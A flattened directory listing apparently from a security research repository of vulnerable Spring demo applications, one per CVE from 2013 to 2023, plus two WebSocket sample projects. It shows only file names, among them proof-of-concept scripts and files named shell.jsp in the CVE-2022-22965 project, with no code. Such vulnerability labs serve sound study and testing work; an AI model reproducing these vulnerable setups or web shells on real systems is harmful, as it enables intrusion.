├── CVE-2013-4152 ├── CVE-2013-4152.iml ├── out │ ├── artifacts │ │ └── CVE_2013_4152_war_exploded │ │ │ ├── WEB-INF │ │ │ ├── classes │ │ │ │ ├── applicationContext.xml │ │ │ │ └── org │ │ │ │ │ └── example │ │ │ │ │ └── jaxb │ │ │ │ │ ├── JaxbController.class │ │ │ │ │ ├── Mapper.class │ │ │ │ │ ├── Order.class │ │ │ │ │ ├── Settings.class │ │ │ │ │ └── User.class │ │ │ ├── jsp │ │ │ │ ├── hello.jsp │ │ │ │ └── test.jsp │ │ │ ├── lib │ │ │ │ ├── commons-fileupload-1.2.jar │ │ │ │ ├── commons-logging-1.1.1.jar │ │ │ │ ├── jstl-1.2.jar │ │ │ │ ├── spring-aop-3.2.4.RELEASE.jar │ │ │ │ ├── spring-aspects-3.2.4.RELEASE.jar │ │ │ │ ├── spring-beans-3.2.4.RELEASE.jar │ │ │ │ ├── spring-build-src-3.2.4.RELEASE.jar │ │ │ │ ├── spring-context-3.2.4.RELEASE.jar │ │ │ │ ├── spring-context-support-3.2.4.RELEASE.jar │ │ │ │ ├── spring-core-3.2.4.RELEASE.jar │ │ │ │ ├── spring-data-commons-1.5.0.RELEASE.jar │ │ │ │ ├── spring-data-jpa-1.5.0.RELEASE.jar │ │ │ │ ├── spring-expression-3.2.4.RELEASE.jar │ │ │ │ ├── spring-instrument-3.2.4.RELEASE.jar │ │ │ │ ├── spring-instrument-tomcat-3.2.4.RELEASE.jar │ │ │ │ ├── spring-jdbc-3.2.4.RELEASE.jar │ │ │ │ ├── spring-jms-3.2.4.RELEASE.jar │ │ │ │ ├── spring-orm-3.2.4.RELEASE.jar │ │ │ │ ├── spring-oxm-3.2.4.RELEASE.jar │ │ │ │ ├── spring-struts-3.2.4.RELEASE.jar │ │ │ │ ├── spring-test-3.2.4.RELEASE.jar │ │ │ │ ├── spring-tx-3.2.4.RELEASE.jar │ │ │ │ ├── spring-web-3.2.4.RELEASE.jar │ │ │ │ ├── spring-webmvc-3.2.4.RELEASE.jar │ │ │ │ ├── spring-webmvc-portlet-3.2.4.RELEASE.jar │ │ │ │ ├── standard.jar │ │ │ │ ├── xml-apis-1.4.01.jar │ │ │ │ ├── xml-resolver-1.2.jar │ │ │ │ ├── xmlpull-1.1.3.1.jar │ │ │ │ ├── xmlschema-core-2.2.1.jar │ │ │ │ ├── xpp3_min-1.1.4c.jar │ │ │ │ └── xstream-1.4.6.jar │ │ │ ├── spring-servlet.xml │ │ │ └── web.xml │ │ │ ├── index.jsp │ │ │ └── resources │ │ │ └── applicationContext.xml │ └── production │ │ └── CVE-2013-4152 │ │ ├── applicationContext.xml │ │ └── org │ │ └── example │ │ └── jaxb │ │ ├── 
JaxbController.class │ │ ├── Mapper.class │ │ ├── Order.class │ │ ├── Settings.class │ │ └── User.class ├── src │ └── org │ │ └── example │ │ └── jaxb │ │ ├── JaxbController.java │ │ ├── Mapper.java │ │ ├── Order.java │ │ └── Settings.java └── web │ ├── WEB-INF │ ├── jsp │ │ ├── hello.jsp │ │ └── test.jsp │ ├── lib │ │ ├── commons-fileupload-1.2.jar │ │ ├── commons-logging-1.1.1.jar │ │ ├── jstl-1.2.jar │ │ ├── spring-aop-3.2.4.RELEASE.jar │ │ ├── spring-aspects-3.2.4.RELEASE.jar │ │ ├── spring-beans-3.2.4.RELEASE.jar │ │ ├── spring-build-src-3.2.4.RELEASE.jar │ │ ├── spring-context-3.2.4.RELEASE.jar │ │ ├── spring-context-support-3.2.4.RELEASE.jar │ │ ├── spring-core-3.2.4.RELEASE.jar │ │ ├── spring-data-commons-1.5.0.RELEASE.jar │ │ ├── spring-data-jpa-1.5.0.RELEASE.jar │ │ ├── spring-expression-3.2.4.RELEASE.jar │ │ ├── spring-instrument-3.2.4.RELEASE.jar │ │ ├── spring-instrument-tomcat-3.2.4.RELEASE.jar │ │ ├── spring-jdbc-3.2.4.RELEASE.jar │ │ ├── spring-jms-3.2.4.RELEASE.jar │ │ ├── spring-orm-3.2.4.RELEASE.jar │ │ ├── spring-oxm-3.2.4.RELEASE.jar │ │ ├── spring-struts-3.2.4.RELEASE.jar │ │ ├── spring-test-3.2.4.RELEASE.jar │ │ ├── spring-tx-3.2.4.RELEASE.jar │ │ ├── spring-web-3.2.4.RELEASE.jar │ │ ├── spring-webmvc-3.2.4.RELEASE.jar │ │ ├── spring-webmvc-portlet-3.2.4.RELEASE.jar │ │ ├── standard.jar │ │ ├── xml-apis-1.4.01.jar │ │ ├── xml-resolver-1.2.jar │ │ ├── xmlpull-1.1.3.1.jar │ │ ├── xmlschema-core-2.2.1.jar │ │ ├── xpp3_min-1.1.4c.jar │ │ └── xstream-1.4.6.jar │ ├── spring-servlet.xml │ └── web.xml │ ├── index.jsp │ └── resources │ ├── applicationContext.xml │ └── poc.xml ├── CVE-2016-4977 ├── demo.iml ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── example │ │ │ └── DemoApplication.java │ │ └── resources │ │ └── application.properties └── target │ └── classes │ ├── application.properties │ └── com │ └── example │ └── DemoApplication.class ├── CVE-2017-8046 ├── accessing-data-rest-complete.iml ├── build.gradle ├── gradle │ └── 
wrapper │ │ ├── gradle-wrapper.jar │ │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat ├── mvnw ├── mvnw.cmd ├── pom.xml ├── settings.gradle ├── src │ ├── main │ │ └── java │ │ │ └── com │ │ │ └── example │ │ │ └── accessingdatarest │ │ │ ├── AccessingDataRestApplication.java │ │ │ ├── Person.java │ │ │ └── PersonRepository.java │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── accessingdatarest │ │ └── AccessingDataRestApplicationTests.java └── target │ ├── classes │ └── com │ │ └── example │ │ └── accessingdatarest │ │ ├── AccessingDataRestApplication.class │ │ ├── Person.class │ │ └── PersonRepository.class │ └── test-classes │ └── com │ └── example │ └── accessingdatarest │ └── AccessingDataRestApplicationTests.class ├── CVE-2018-1259 ├── README.md ├── pom.xml ├── spring-data-web-projection.iml ├── src │ └── main │ │ ├── java │ │ └── example │ │ │ └── users │ │ │ ├── Application.java │ │ │ └── UserController.java │ │ └── resources │ │ └── application.properties └── target │ └── classes │ ├── application.properties │ └── example │ └── users │ ├── Application.class │ ├── UserController$UserPayload.class │ └── UserController.class ├── CVE-2018-1260 ├── demo.iml ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── example │ │ │ ├── DefaultOAuth2RequestValidator.java │ │ │ ├── DemoApplication.java │ │ │ └── OAuthSecurityConfig.java │ │ └── resources │ │ └── application.properties └── target │ └── classes │ ├── application.properties │ └── com │ └── example │ ├── DefaultOAuth2RequestValidator.class │ ├── DemoApplication.class │ └── OAuthSecurityConfig.class ├── CVE-2018-1261 ├── HELP.md ├── cve_2018_1261.py ├── demo.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── demo │ │ │ │ ├── AbstractZipTransformer.java │ │ │ │ ├── DemoApplication.java │ │ │ │ ├── SpringZipUtils.java │ │ │ │ ├── UnZipTransformer.java │ │ │ │ ├── ZipHeaders.java │ │ │ │ ├── ZipResultType.java │ │ │ 
│ └── ZipTransformer.java │ │ └── resources │ │ │ ├── application.properties │ │ │ └── test.zip │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplicationTests.java └── target │ └── classes │ ├── application.properties │ ├── com │ └── example │ │ └── demo │ │ ├── AbstractZipTransformer.class │ │ ├── DemoApplication.class │ │ ├── SpringZipUtils.class │ │ ├── UnZipTransformer$1.class │ │ ├── UnZipTransformer.class │ │ ├── ZipHeaders.class │ │ ├── ZipResultType.class │ │ └── ZipTransformer.class │ └── test.zip ├── CVE-2018-1270 ├── build.gradle ├── cve-2018-1270.py ├── gradle │ └── wrapper │ │ ├── gradle-wrapper.jar │ │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat ├── gs-messaging-stomp-websocket.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── hello │ │ │ │ ├── Application.java │ │ │ │ ├── Greeting.java │ │ │ │ ├── GreetingController.java │ │ │ │ ├── HelloMessage.java │ │ │ │ └── WebSocketConfig.java │ │ └── resources │ │ │ ├── application.properties │ │ │ └── static │ │ │ ├── app.js │ │ │ ├── index.html │ │ │ └── main.css │ └── test │ │ └── java │ │ └── hello │ │ └── GreetingIntegrationTests.java └── target │ ├── classes │ ├── application.properties │ ├── hello │ │ ├── Application.class │ │ ├── Greeting.class │ │ ├── GreetingController.class │ │ ├── HelloMessage.class │ │ └── WebSocketConfig.class │ └── static │ │ ├── app.js │ │ ├── index.html │ │ └── main.css │ └── test-classes │ └── hello │ ├── GreetingIntegrationTests$1$1.class │ ├── GreetingIntegrationTests$1.class │ ├── GreetingIntegrationTests$TestSessionHandler.class │ └── GreetingIntegrationTests.class ├── CVE-2018-1273 ├── README.md ├── pom.xml ├── spring-data-web-example.iml ├── src │ ├── main │ │ ├── java │ │ │ └── example │ │ │ │ ├── Application.java │ │ │ │ └── users │ │ │ │ ├── Password.java │ │ │ │ ├── User.java │ │ │ │ ├── UserManagement.java │ │ │ │ ├── UserRepository.java │ │ │ │ ├── Username.java │ │ │ │ └── web │ │ │ │ └── 
UserController.java │ │ └── resources │ │ │ ├── application.properties │ │ │ ├── messages.properties │ │ │ ├── static │ │ │ └── css │ │ │ │ └── style.css │ │ │ └── templates │ │ │ └── users.html │ └── test │ │ └── java │ │ └── example │ │ └── users │ │ ├── AbstractIntegrationTests.java │ │ ├── UserManagementIntegrationTests.java │ │ └── UserRepositoryIntegrationTests.java └── target │ └── classes │ ├── application.properties │ ├── example │ ├── Application.class │ └── users │ │ ├── Password.class │ │ ├── User.class │ │ ├── UserManagement.class │ │ ├── UserRepository.class │ │ ├── Username.class │ │ └── web │ │ ├── UserController$UserForm.class │ │ └── UserController.class │ ├── messages.properties │ ├── static │ └── css │ │ └── style.css │ └── templates │ └── users.html ├── CVE-2019-3799 ├── pom.xml ├── spring-cloud-config-server.iml └── src │ └── main │ ├── java │ └── org │ │ └── springframework │ │ └── cloud │ │ └── config │ │ └── server │ │ ├── ConfigServerApplication.java │ │ ├── EnableConfigServer.java │ │ ├── bootstrap │ │ ├── ConfigServerBootstrapApplicationListener.java │ │ └── ConfigServerBootstrapConfiguration.java │ │ ├── composite │ │ ├── CompositeEnvironmentBeanFactoryPostProcessor.java │ │ ├── CompositeUtils.java │ │ ├── ConditionalOnMissingSearchPathLocator.java │ │ ├── ConditionalOnSearchPathLocator.java │ │ └── OnSearchPathLocatorPresent.java │ │ ├── config │ │ ├── CompositeConfiguration.java │ │ ├── ConfigServerAutoConfiguration.java │ │ ├── ConfigServerConfiguration.java │ │ ├── ConfigServerEncryptionConfiguration.java │ │ ├── ConfigServerHealthIndicator.java │ │ ├── ConfigServerMvcConfiguration.java │ │ ├── ConfigServerProperties.java │ │ ├── EncryptionAutoConfiguration.java │ │ ├── EnvironmentRepositoryConfiguration.java │ │ └── ResourceRepositoryConfiguration.java │ │ ├── diagnostics │ │ └── GitUriFailureAnalyzer.java │ │ ├── encryption │ │ ├── CipherEnvironmentEncryptor.java │ │ ├── EncryptionController.java │ │ ├── EnvironmentEncryptor.java 
│ │ ├── EnvironmentPrefixHelper.java │ │ ├── KeyStoreTextEncryptorLocator.java │ │ ├── LocatorTextEncryptor.java │ │ ├── PassthruSecretLocator.java │ │ ├── SecretLocator.java │ │ ├── SingleTextEncryptorLocator.java │ │ └── TextEncryptorLocator.java │ │ ├── environment │ │ ├── AbstractScmEnvironmentRepository.java │ │ ├── CompositeEnvironmentRepository.java │ │ ├── ConfigurableHttpConnectionFactory.java │ │ ├── ConsulEnvironmentWatch.java │ │ ├── EnvironmentCleaner.java │ │ ├── EnvironmentController.java │ │ ├── EnvironmentEncryptorEnvironmentRepository.java │ │ ├── EnvironmentNotFoundException.java │ │ ├── EnvironmentRepository.java │ │ ├── EnvironmentRepositoryFactory.java │ │ ├── EnvironmentRepositoryPropertySourceLocator.java │ │ ├── EnvironmentWatch.java │ │ ├── HttpClientConfigurableHttpConnectionFactory.java │ │ ├── HttpClientVaultRestTemplateFactory.java │ │ ├── JGitEnvironmentProperties.java │ │ ├── JGitEnvironmentRepository.java │ │ ├── JdbcEnvironmentProperties.java │ │ ├── JdbcEnvironmentRepository.java │ │ ├── JdbcEnvironmentRepositoryFactory.java │ │ ├── MultipleJGitEnvironmentProperties.java │ │ ├── MultipleJGitEnvironmentRepository.java │ │ ├── MultipleJGitEnvironmentRepositoryFactory.java │ │ ├── NativeEnvironmentProperties.java │ │ ├── NativeEnvironmentRepository.java │ │ ├── NativeEnvironmentRepositoryFactory.java │ │ ├── NoSuchLabelException.java │ │ ├── NoSuchRepositoryException.java │ │ ├── PassthruEnvironmentRepository.java │ │ ├── RepositoryException.java │ │ ├── SearchPathCompositeEnvironmentRepository.java │ │ ├── SearchPathLocator.java │ │ ├── SerializableMapPropertySource.java │ │ ├── SvnEnvironmentRepositoryFactory.java │ │ ├── SvnKitEnvironmentProperties.java │ │ ├── SvnKitEnvironmentRepository.java │ │ ├── VaultEnvironmentProperties.java │ │ ├── VaultEnvironmentRepository.java │ │ ├── VaultEnvironmentRepositoryFactory.java │ │ ├── VaultKvAccessStrategy.java │ │ ├── VaultKvAccessStrategyFactory.java │ │ └── 
VaultKvAccessStrategySupport.java │ │ ├── proxy │ │ ├── ProxyHostCredentialsProvider.java │ │ ├── ProxyHostProperties.java │ │ └── SchemeBasedRoutePlanner.java │ │ ├── resource │ │ ├── GenericResourceRepository.java │ │ ├── NoSuchResourceException.java │ │ ├── ResourceController.java │ │ └── ResourceRepository.java │ │ ├── ssh │ │ ├── FileBasedSshTransportConfigCallback.java │ │ ├── HostKeyAlgoSupported.java │ │ ├── HostKeyAlgoSupportedValidator.java │ │ ├── HostKeyAndAlgoBothExist.java │ │ ├── HostKeyAndAlgoBothExistValidator.java │ │ ├── KnownHostsFileIsValid.java │ │ ├── KnownHostsFileValidator.java │ │ ├── PrivateKeyIsValid.java │ │ ├── PrivateKeyValidator.java │ │ ├── PropertiesBasedSshTransportConfigCallback.java │ │ ├── PropertyBasedSshSessionFactory.java │ │ ├── SshPropertyValidator.java │ │ └── SshUriPropertyProcessor.java │ │ ├── support │ │ ├── AbstractScmAccessor.java │ │ ├── AbstractScmAccessorProperties.java │ │ ├── AwsCodeCommitCredentialProvider.java │ │ ├── CredentialException.java │ │ ├── EnvironmentPropertySource.java │ │ ├── EnvironmentRepositoryProperties.java │ │ ├── GitCredentialsProviderFactory.java │ │ ├── GitSkipSslValidationCredentialsProvider.java │ │ ├── HttpClientSupport.java │ │ ├── HttpEnvironmentRepositoryProperties.java │ │ └── PassphraseCredentialsProvider.java │ │ └── test │ │ └── ConfigServerTestUtils.java │ └── resources │ ├── META-INF │ └── spring.factories │ └── configserver.yml ├── CVE-2020-5398 ├── HELP.md ├── demo.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── demo │ │ │ │ ├── DemoApplication.java │ │ │ │ └── MainController.java │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplicationTests.java └── target │ ├── classes │ ├── application.properties │ └── com │ │ └── example │ │ └── demo │ │ ├── DemoApplication.class │ │ └── MainController.class │ └── test-classes │ └── com │ 
└── example │ └── demo │ └── DemoApplicationTests.class ├── CVE-2020-5412 ├── hystrix-dashboard.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── org │ │ │ │ └── example │ │ │ │ └── HystrixDashboardApplication.java │ │ └── resources │ │ │ └── bootstrap.properties │ └── test │ │ └── java │ │ └── com │ │ └── org │ │ └── example │ │ └── HystrixDashboardApplicationTests.java └── target │ ├── classes │ ├── bootstrap.properties │ └── com │ │ └── org │ │ └── example │ │ └── HystrixDashboardApplication.class │ └── test-classes │ └── com │ └── org │ └── example │ └── HystrixDashboardApplicationTests.class ├── CVE-2020-5421 ├── CVE-2020-5421.iml ├── Readme.md ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── org │ │ │ └── example │ │ │ ├── SpringBootApplication.java │ │ │ ├── config │ │ │ └── FilterConfig.java │ │ │ ├── controller │ │ │ └── TestController.java │ │ │ └── filter │ │ │ └── SpringJsessionidRdfFilter.java │ │ └── resources │ │ └── application.properties └── target │ └── classes │ ├── application.properties │ └── com │ └── org │ └── example │ ├── SpringBootApplication.class │ ├── config │ └── FilterConfig.class │ ├── controller │ └── TestController.class │ └── filter │ └── SpringJsessionidRdfFilter.class ├── CVE-2021-21234 ├── Dockerfile ├── pom.xml ├── spring-boot-hello-world-example.iml ├── spring.log │ └── spring.log ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── boraji │ │ │ └── tutorial │ │ │ └── springboot │ │ │ ├── MainApp.java │ │ │ └── controller │ │ │ └── HelloWorldController.java │ │ └── resources │ │ └── application.properties └── target │ └── classes │ ├── application.properties │ └── com │ └── boraji │ └── tutorial │ └── springboot │ ├── MainApp.class │ └── controller │ └── HelloWorldController.class ├── CVE-2021-22053 ├── HELP.md ├── demo.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── demo │ │ │ │ └── 
DemoApplication.java │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplicationTests.java └── target │ ├── classes │ ├── application.properties │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplication.class │ └── test-classes │ └── com │ └── example │ └── demo │ └── DemoApplicationTests.class ├── CVE-2022-22947 ├── HELP.md ├── demo.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── demo │ │ │ │ └── DemoApplication.java │ │ └── resources │ │ │ ├── application.properties │ │ │ └── application.yaml │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplicationTests.java └── target │ ├── classes │ ├── application.properties │ ├── application.yaml │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplication.class │ └── test-classes │ └── com │ └── example │ └── demo │ └── DemoApplicationTests.class ├── CVE-2022-22963 ├── HELP.md ├── demo.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── demo │ │ │ │ ├── DemoApplication.java │ │ │ │ └── TestController.java │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplicationTests.java └── target │ ├── classes │ ├── application.properties │ └── com │ │ └── example │ │ └── demo │ │ ├── DemoApplication.class │ │ └── TestController.class │ └── test-classes │ └── com │ └── example │ └── demo │ └── DemoApplicationTests.class ├── CVE-2022-22965 ├── SpringRCEDemo.iml ├── pom.xml ├── src │ └── main │ │ ├── java │ │ └── org │ │ │ └── axisx │ │ │ └── SpringRCEDemo │ │ │ ├── GlobalFilter.java │ │ │ ├── HelloController.java │ │ │ └── User.java │ │ ├── resources │ │ └── spring │ │ │ └── spring-mvc.xml │ │ └── webapp │ │ ├── WEB-INF │ │ └── web.xml │ │ ├── index.jsp │ │ └── shell.jsp └── target │ ├── 
SpringRCEDemo-1.0-SNAPSHOT.war │ ├── SpringRCEDemo-1.0-SNAPSHOT │ ├── WEB-INF │ │ ├── classes │ │ │ ├── org │ │ │ │ ├── axisx │ │ │ │ │ └── SpringRCEDemo │ │ │ │ │ │ ├── GlobalFilter.class │ │ │ │ │ │ ├── HelloController.class │ │ │ │ │ │ └── User.class │ │ │ │ └── magiczero │ │ │ │ │ └── SpringRCEDemo │ │ │ │ │ ├── HelloController.class │ │ │ │ │ └── User.class │ │ │ └── spring │ │ │ │ └── spring-mvc.xml │ │ ├── lib │ │ │ ├── aspectjweaver-1.9.7.jar │ │ │ ├── slf4j-api-1.7.21.jar │ │ │ ├── spring-aop-5.3.16.jar │ │ │ ├── spring-aspects-5.3.16.jar │ │ │ ├── spring-beans-5.3.16.jar │ │ │ ├── spring-context-5.3.16.jar │ │ │ ├── spring-context-support-5.3.16.jar │ │ │ ├── spring-core-5.3.16.jar │ │ │ ├── spring-expression-5.3.16.jar │ │ │ ├── spring-jcl-5.3.16.jar │ │ │ ├── spring-ldap-core-2.3.3.RELEASE.jar │ │ │ ├── spring-oxm-5.3.16.jar │ │ │ ├── spring-security-core-5.4.2.jar │ │ │ ├── spring-security-ldap-5.4.2.jar │ │ │ ├── spring-test-5.3.16.jar │ │ │ ├── spring-tx-5.2.11.RELEASE.jar │ │ │ ├── spring-web-5.3.16.jar │ │ │ └── spring-webmvc-5.3.16.jar │ │ ├── shell3.jsp │ │ └── web.xml │ ├── index.jsp │ ├── shell.jsp │ └── shell1.jsp │ ├── classes │ ├── org │ │ └── axisx │ │ │ └── SpringRCEDemo │ │ │ ├── HelloController.class │ │ │ └── User.class │ └── spring │ │ └── spring-mvc.xml │ ├── maven-archiver │ └── pom.properties │ └── maven-status │ └── maven-compiler-plugin │ ├── compile │ └── default-compile │ │ ├── createdFiles.lst │ │ └── inputFiles.lst │ └── testCompile │ └── default-testCompile │ └── inputFiles.lst ├── CVE-2022-22978 ├── HELP.md ├── demo.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── demo │ │ │ │ ├── Config │ │ │ │ └── AuthConfig.java │ │ │ │ ├── Controller │ │ │ │ └── AuthController.java │ │ │ │ └── DemoApplication.java │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplicationTests.java └── target 
│ ├── classes │ ├── application.properties │ └── com │ │ └── example │ │ └── demo │ │ ├── Config │ │ └── AuthConfig.class │ │ ├── Controller │ │ └── AuthController.class │ │ └── DemoApplication.class │ └── test-classes │ └── com │ └── example │ └── demo │ └── DemoApplicationTests.class ├── CVE-2022-22979 ├── CVE-2022-22979.iml ├── HELP.md ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── demo │ │ │ │ ├── DemoApplication.java │ │ │ │ ├── LowercaseConfiguration.java │ │ │ │ └── TestController.java │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ ├── DemoApplicationTests.java │ │ ├── SampleApplicationMvcTests.java │ │ └── SampleApplicationTests.java └── target │ ├── classes │ ├── application.properties │ └── com │ │ └── example │ │ └── demo │ │ ├── Bar.class │ │ ├── DemoApplication.class │ │ ├── Foo.class │ │ ├── LowercaseConfiguration.class │ │ └── TestController.class │ └── test-classes │ └── com │ └── example │ └── demo │ └── DemoApplicationTests.class ├── CVE-2022-31692 ├── HELP.md ├── demo.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── demo │ │ │ │ ├── Config │ │ │ │ └── AuthConfig.java │ │ │ │ ├── Controller │ │ │ │ └── AuthController.java │ │ │ │ └── DemoApplication.java │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplicationTests.java └── target │ ├── classes │ ├── application.properties │ └── com │ │ └── example │ │ └── demo │ │ ├── Config │ │ └── AuthConfig.class │ │ ├── Controller │ │ └── AuthController.class │ │ └── DemoApplication.class │ └── test-classes │ └── com │ └── example │ └── demo │ └── DemoApplicationTests.class ├── CVE-2023-20860 ├── HELP.md ├── demo.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── 
demo │ │ │ │ ├── Config │ │ │ │ └── AuthConfig.java │ │ │ │ ├── Controller │ │ │ │ └── AuthController.java │ │ │ │ └── DemoApplication.java │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplicationTests.java └── target │ ├── classes │ ├── application.properties │ └── com │ │ └── example │ │ └── demo │ │ ├── Config │ │ └── AuthConfig.class │ │ ├── Controller │ │ └── AuthController.class │ │ └── DemoApplication.class │ └── test-classes │ └── com │ └── example │ └── demo │ └── DemoApplicationTests.class ├── CVE-2023-34034 ├── HELP.md ├── demo.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── demo │ │ │ │ ├── Config │ │ │ │ └── AuthConfig.java │ │ │ │ ├── Controller │ │ │ │ ├── AdminController.java │ │ │ │ └── PublicController.java │ │ │ │ └── DemoApplication.java │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplicationTests.java └── target │ └── classes │ ├── application.properties │ └── com │ └── example │ └── demo │ ├── Config │ └── AuthConfig.class │ ├── Controller │ ├── AdminController.class │ └── PublicController.class │ └── DemoApplication.class ├── CVE-2023-34035 ├── HELP.md ├── demo.iml ├── mvnw ├── mvnw.cmd ├── pom.xml ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── demo │ │ │ │ ├── Config │ │ │ │ └── AuthConfig.java │ │ │ │ ├── Controller │ │ │ │ └── AuthController.java │ │ │ │ └── DemoApplication.java │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── demo │ │ └── DemoApplicationTests.java └── target │ ├── classes │ ├── application.properties │ └── com │ │ └── example │ │ └── demo │ │ ├── Config │ │ └── AuthConfig.class │ │ ├── Controller │ │ └── AuthController.class │ │ └── DemoApplication.class │ ├── demo-0.0.1-SNAPSHOT.jar │ ├── 
demo-0.0.1-SNAPSHOT.jar.original │ ├── maven-archiver │ └── pom.properties │ ├── maven-status │ └── maven-compiler-plugin │ │ ├── compile │ │ └── default-compile │ │ │ ├── createdFiles.lst │ │ │ └── inputFiles.lst │ │ └── testCompile │ │ └── default-testCompile │ │ ├── createdFiles.lst │ │ └── inputFiles.lst │ ├── surefire-reports │ ├── TEST-com.example.demo.DemoApplicationTests.xml │ └── com.example.demo.DemoApplicationTests.txt │ └── test-classes │ └── com │ └── example │ └── demo │ └── DemoApplicationTests.class ├── Projects ├── Spring-WebSocket-with-STOMP │ ├── README.md │ ├── pom.xml │ ├── spring-websocket-integration.iml │ ├── src │ │ └── main │ │ │ ├── java │ │ │ └── com │ │ │ │ └── devglan │ │ │ │ ├── Application.java │ │ │ │ ├── config │ │ │ │ └── WebSocketConfig.java │ │ │ │ ├── controller │ │ │ │ └── WebSocketController.java │ │ │ │ ├── interceptor │ │ │ │ ├── ReceiveMessageChannelInterceptor.java │ │ │ │ ├── SendMessageChannelInterceptor.java │ │ │ │ └── WebSocketHandshakeInterceptor.java │ │ │ │ └── websocket │ │ │ │ └── event │ │ │ │ ├── StompConnectEventListener.java │ │ │ │ ├── StompConnectedEventListener.java │ │ │ │ └── StompSubscribeEventListener.java │ │ │ └── resources │ │ │ ├── application.properties │ │ │ └── static │ │ │ ├── app.js │ │ │ ├── bootstrap.min.css │ │ │ ├── index.html │ │ │ ├── jquery-1.10.2.min.js │ │ │ ├── main.css │ │ │ └── stomp.js │ └── target │ │ └── classes │ │ ├── application.properties │ │ ├── com │ │ └── devglan │ │ │ ├── Application.class │ │ │ ├── config │ │ │ ├── WebSocketConfig$1.class │ │ │ ├── WebSocketConfig$2.class │ │ │ └── WebSocketConfig.class │ │ │ ├── controller │ │ │ └── WebSocketController.class │ │ │ ├── interceptor │ │ │ ├── ReceiveMessageChannelInterceptor.class │ │ │ ├── SendMessageChannelInterceptor.class │ │ │ └── WebSocketHandshakeInterceptor.class │ │ │ └── websocket │ │ │ └── event │ │ │ ├── StompConnectEventListener.class │ │ │ ├── StompConnectedEventListener.class │ │ │ └── 
StompSubscribeEventListener.class │ │ └── static │ │ ├── app.js │ │ ├── bootstrap.min.css │ │ ├── index.html │ │ ├── jquery-1.10.2.min.js │ │ ├── main.css │ │ └── stomp.js └── Spring-WebSocket-without-STOMP │ ├── HELP.md │ ├── demo.iml │ ├── mvnw │ ├── mvnw.cmd │ ├── pom.xml │ ├── src │ └── main │ │ ├── java │ │ └── com │ │ │ └── example │ │ │ └── demo │ │ │ ├── BinarySocketHandler.java │ │ │ ├── DemoApplication.java │ │ │ ├── ProtocolBufferSocketHandler.java │ │ │ ├── SocketHandler.java │ │ │ └── WebSocketConfig.java │ │ └── resources │ │ ├── application.properties │ │ └── static │ │ ├── app.js │ │ ├── bootstrap.min.css │ │ ├── index.html │ │ ├── jquery-1.10.2.min.js │ │ └── main.css │ └── target │ ├── classes │ ├── application.properties │ ├── com │ │ └── example │ │ │ └── demo │ │ │ ├── BinarySocketHandler.class │ │ │ ├── DemoApplication.class │ │ │ ├── ProtocolBufferSocketHandler.class │ │ │ ├── SocketHandler.class │ │ │ └── WebSocketConfig.class │ └── static │ │ ├── app.js │ │ ├── bootstrap.min.css │ │ ├── index.html │ │ ├── jquery-1.10.2.min.js │ │ └── main.css │ ├── demo-0.0.1-SNAPSHOT.jar │ ├── demo-0.0.1-SNAPSHOT.jar.original │ ├── maven-archiver │ └── pom.properties │ └── maven-status │ └── 